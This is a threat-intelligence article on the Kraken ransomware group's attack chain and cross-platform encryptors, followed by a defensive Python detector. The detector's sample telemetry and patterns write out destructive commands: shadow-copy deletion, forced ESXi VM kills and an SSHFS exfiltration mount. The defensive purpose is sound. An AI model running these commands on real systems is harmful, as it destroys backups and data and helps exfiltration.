Cisco Talos has identified an emerging threat from Kraken, a sophisticated cross-platform ransomware group that has emerged from the remnants of the HelloKitty ransomware cartel.
In August 2025, the security firm observed the Russian-speaking group conducting big-game hunting and double-extortion attacks against enterprise environments worldwide.
Kraken represents a significant evolution in ransomware threats due to its multi-platform capabilities.
Unlike traditional ransomware families that target a single operating system, Kraken features distinct encryptors engineered explicitly for Windows, Linux, and VMware ESXi systems.
This architectural approach allows the group to maximize damage across diverse infrastructure environments, from traditional servers to virtualized ecosystems.
According to Talos incident response observations, Kraken’s infection chain begins with the exploitation of Server Message Block (SMB) vulnerabilities on internet-exposed servers. Once initial access is established, attackers extract privileged credentials before re-entering the victim environment via Remote Desktop Protocol connections.

The group leverages Cloudflared for persistence and SSH Filesystem (SSHFS) for data exfiltration before initiating encryption, a sequence that demonstrates operational sophistication.
The group employs a double extortion model, combining encryption with data theft. Victims are threatened with public disclosure on Kraken’s data leak site if ransom demands are not met. In observed cases, the group has demanded approximately 1 million USD in Bitcoin, with assurances of decryption and non-disclosure following payment.
Notable Technical Capabilities
Kraken ransomware incorporates a distinctive feature rarely observed in modern ransomware: encryption benchmarking.
Before initiating the actual encryption process, the malware tests the victim machine’s performance to optimize the attack.
This capability allows operators to decide between full and partial encryption based on the available resources, maximizing operational efficiency while reducing the risk of detection that resource exhaustion on the victim machine would otherwise cause.

The Windows variant is a 32-bit executable written in C++ and employs sophisticated anti-analysis techniques, including control flow obfuscation, WoW64 redirection manipulation, and exception handler tampering.
The ransomware turns off Windows Backup services, removes system restore points, and deletes the recycle bin to prevent recovery. It specifically targets SQL databases and network shares while preserving executable and library files to allow victims to communicate with attackers.
The Linux and ESXi variants demonstrate platform-specific adaptations, with automatic system type detection and corresponding behavioral modifications.

On ESXi systems, the malware forcefully terminates running virtual machines before encryption. Both variants employ multi-threaded encryption using RSA-4096 and ChaCha20 algorithms, appending the .zpsc file extension to encrypted files.
Intelligence suggests Kraken emerged from HelloKitty operators, supported by identical ransom note filenames and explicit references to HelloKitty within Kraken’s data leak site.
In September 2025, Kraken announced “The Last Haven Board,” a new underground forum designed for anonymous cybercriminal communication.
The announcement noted support from HelloKitty operators and WeaCorp, an exploit buyer organization, further establishing potential ties to established ransomware infrastructure.

Geographic Scope
Kraken demonstrates opportunistic targeting without concentration on specific business verticals. Documented victims span multiple geographies including the United States, United Kingdom, Canada, Denmark, Panama, and Kuwait, indicating a broadly indiscriminate approach to target selection.
Organizations should implement robust SMB network segmentation, maintain current backup systems isolated from production networks, enforce multi-factor authentication, and deploy behavioral detection tools capable of identifying ransomware execution patterns across Windows, Linux, and virtualization platforms.
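As an added illustration of the behavioral detection the article recommends (example code written for this page, not tooling from Cisco Talos or the article's author), the routine below correlates constructed telemetry lines for the stages described above: RDP re-entry, Cloudflared persistence, SSHFS exfiltration, backup tampering, ESXi virtual machine termination, and a burst of renames to the .zpsc extension. The host names, timestamps, log format, and the specific command-line patterns each stage matches are assumptions; only the .zpsc extension and the order of the stages come from the article.

```python
"""
Added example (not from the Talos report or the article): correlate host
telemetry for the Kraken-style intrusion sequence described in the text.
All log lines, hosts, and command-line patterns below are constructed.
"""
import re
from collections import defaultdict

# One regex per pre-encryption stage.  How these actions surface in real
# EDR or syslog telemetry is an assumption made for this demo.
STAGES = [
    ("rdp_logon",     re.compile(r"logon_type=10\b")),
    ("cloudflared",   re.compile(r"\bcloudflared(\.exe)?\b.*\b(service install|tunnel run)\b")),
    ("sshfs_mount",   re.compile(r"\bsshfs\b")),
    ("backup_tamper", re.compile(r"(vssadmin .*delete shadows|wbadmin delete|sc stop wbengine)", re.I)),
    ("vm_kill",       re.compile(r"\besxcli vm process kill\b")),
]
# Encrypted files get the .zpsc extension (from the article).
ZPSC_RENAME = re.compile(r"rename .* -> \S+\.zpsc\b")


def classify(line):
    """Return the stage name a single event line matches, or None."""
    for name, pattern in STAGES:
        if pattern.search(line):
            return name
    if ZPSC_RENAME.search(line):
        return "zpsc_rename"
    return None


def correlate(events):
    """Group (host, line) pairs per host: which stages fired, how many .zpsc renames."""
    per_host = defaultdict(lambda: {"stages": set(), "zpsc": 0})
    for host, line in events:
        entry = per_host[host]          # register the host even if nothing matches
        stage = classify(line)
        if stage == "zpsc_rename":
            entry["zpsc"] += 1
        elif stage:
            entry["stages"].add(stage)
    return dict(per_host)


def verdict(summary, rename_threshold=10):
    """Rename burst plus any earlier stage -> likely chain; either alone -> suspicious."""
    burst = summary["zpsc"] >= rename_threshold
    if burst and summary["stages"]:
        return "likely_kraken_chain"
    if burst or summary["stages"]:
        return "suspicious"
    return "clean"


def triage(events, rename_threshold=10):
    """Map every host seen in the events to a verdict string."""
    return {host: verdict(s, rename_threshold) for host, s in correlate(events).items()}


# Constructed sample telemetry: fs01 shows the full Windows chain, esx01 the
# ESXi variant, web02 only an RDP logon, db03 only routine activity.
SAMPLE_EVENTS = [
    ("fs01", "2025-08-14T02:11:05 security event_id=4624 logon_type=10 user=svc_backup src=10.0.9.4"),
    ("fs01", "2025-08-14T02:15:40 process cloudflared.exe service install --token <redacted> parent=cmd.exe"),
    ("fs01", "2025-08-14T02:20:02 process sshfs op@203.0.113.7:/drop /mnt/x"),
    ("fs01", "2025-08-14T02:31:12 process vssadmin delete shadows /all /quiet"),
] + [
    ("fs01", f"2025-08-14T02:40:{i:02d} file rename C:\\Data\\doc{i}.docx -> C:\\Data\\doc{i}.docx.zpsc")
    for i in range(12)
] + [
    ("esx01", "2025-08-14T03:02:00 shell esxcli vm process kill --type=force --world-id=<constructed>"),
] + [
    ("esx01", f"2025-08-14T03:05:{i:02d} file rename /vmfs/volumes/ds1/vm{i}/vm{i}.vmdk -> /vmfs/volumes/ds1/vm{i}/vm{i}.vmdk.zpsc")
    for i in range(10)
] + [
    ("web02", "2025-08-14T02:12:30 security event_id=4624 logon_type=10 user=admin src=10.0.9.4"),
    ("db03", "2025-08-14T02:13:00 process sqlservr.exe checkpoint completed"),
    ("db03", "2025-08-14T02:14:00 file rename D:\\Logs\\app.log -> D:\\Logs\\app.log.1"),
]

if __name__ == "__main__":
    for host, result in sorted(triage(SAMPLE_EVENTS).items()):
        print(f"{host:6s} {result}")
```

The rename threshold and the two-part verdict are deliberate: a single .zpsc rename is a weak signal on its own, but a burst of them on a host that already showed a persistence or exfiltration stage matches the sequence the article describes closely enough to page an analyst, and the ESXi path is scored the same way so that VM termination followed by renames is not under-weighted just because fewer stages apply there.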
